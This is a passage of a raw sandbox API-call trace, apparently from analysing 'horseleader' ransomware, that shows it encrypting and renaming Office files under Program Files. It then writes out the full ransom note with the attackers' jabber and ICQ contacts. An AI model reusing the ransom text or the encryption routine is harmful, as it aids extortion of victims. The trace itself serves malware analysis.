lpNumberOfBytesRead=0x32ae904*=0x1931, lpOverlapped=0x0) returned 1 [0244.548] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe6cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.548] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1931, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1931, lpOverlapped=0x0) returned 1 [0244.548] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.548] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.548] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.549] CloseHandle (hObject=0x15c) returned 1 [0244.549] GetProcessHeap () returned 0x780000 [0244.549] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.549] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.horseleader") returned 119 [0244.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.horseleader")) returned 1 [0244.550] GetProcessHeap () returned 0x780000 [0244.550] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.550] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d4800, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa7d4800, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="PSS10R.CHM", cAlternateFileName="")) returned 1 [0244.550] lstrcmpiW (lpString1="PSS10R.CHM", lpString2="Windows") returned -1 [0244.550] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 107 [0244.550] StrStrIW (lpFirst="PSS10R.CHM", lpSrch=".horseleader") returned 0x0 [0244.550] lstrcmpW (lpString1="PSS10R.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.550] lstrcmpW (lpString1="PSS10R.CHM", lpString2="_uninstalling_.png") returned 1 [0244.550] lstrlenW (lpString=".testttjffg") returned 11 [0244.550] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM", lpSrch=".testttjffg") returned 0x0 [0244.550] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.550] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.552] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 107 [0244.552] StrStrW (lpFirst="PSS10R.CHM", lpSrch=".txt") returned 0x0 [0244.552] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=27195) returned 1 [0244.552] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.555] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.556] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.556] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x1a3b, lpOverlapped=0x0) returned 1 [0244.556] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe5c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.556] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1a3b, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1a3b, lpOverlapped=0x0) returned 1 [0244.557] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.557] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.557] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.557] CloseHandle (hObject=0x15c) returned 1 [0244.557] GetProcessHeap () returned 0x780000 [0244.557] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.557] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.horseleader") returned 119 [0244.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.horseleader")) returned 1 [0244.558] GetProcessHeap () returned 0x780000 [0244.558] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.558] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49087c00, ftCreationTime.dwHighDateTime=0x1ca95c1, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49087c00, ftLastWriteTime.dwHighDateTime=0x1ca95c1, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.CHM", cAlternateFileName="")) returned 1 [0244.558] lstrcmpiW (lpString1="SETUP.CHM", lpString2="Windows") returned -1 [0244.559] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 106 [0244.559] StrStrIW (lpFirst="SETUP.CHM", lpSrch=".horseleader") returned 0x0 [0244.559] lstrcmpW (lpString1="SETUP.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.559] lstrcmpW (lpString1="SETUP.CHM", lpString2="_uninstalling_.png") returned 1 [0244.559] lstrlenW (lpString=".testttjffg") returned 11 [0244.559] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM", lpSrch=".testttjffg") returned 0x0 [0244.559] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.559] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.560] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 106 [0244.560] StrStrW (lpFirst="SETUP.CHM", lpSrch=".txt") returned 0x0 [0244.560] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=67190) returned 1 [0244.560] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.561] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.563] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.563] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.563] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x5b3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.563] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.565] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.565] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.565] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xb676, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.565] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.566] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.566] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.566] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.566] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.566] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.567] CloseHandle (hObject=0x15c) returned 1 [0244.567] GetProcessHeap () returned 0x780000 [0244.567] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.567] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.horseleader") returned 118 [0244.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.horseleader")) returned 1 [0244.568] GetProcessHeap () returned 0x780000 [0244.568] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.568] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.568] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.568] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 106 [0244.568] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.569] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.569] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.569] lstrlenW (lpString=".testttjffg") returned 11 [0244.569] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.569] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.569] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.569] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.570] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 106 [0244.570] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.570] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=9352) returned 1 [0244.570] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2488, lpOverlapped=0x0) returned 1 [0244.572] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdb78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.572] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2488, lpOverlapped=0x0) returned 1 [0244.573] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.573] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.573] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.573] CloseHandle (hObject=0x15c) returned 1 [0244.573] GetProcessHeap () returned 0x780000 [0244.573] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.573] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.horseleader") returned 118 [0244.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.horseleader")) returned 1 [0244.574] GetProcessHeap () returned 0x780000 [0244.574] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.574] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8728670, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.575] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.575] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\#Decrypt#.txt") returned 110 [0244.575] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.576] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.576] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.577] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.577] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.578] CloseHandle (hObject=0x1a4) returned 1 [0244.578] GetProcessHeap () returned 0x780000 [0244.578] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.578] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Office32.en-us", cAlternateFileName="OFFICE~2.EN-")) returned 1 [0244.578] lstrcmpiW (lpString1="Office32.en-us", lpString2="Windows") returned -1 [0244.578] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us") returned 98 [0244.578] lstrcmpW (lpString1="Office32.en-us", lpString2=".") returned 1 [0244.578] lstrcmpW (lpString1="Office32.en-us", lpString2="..") returned 1 [0244.578] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 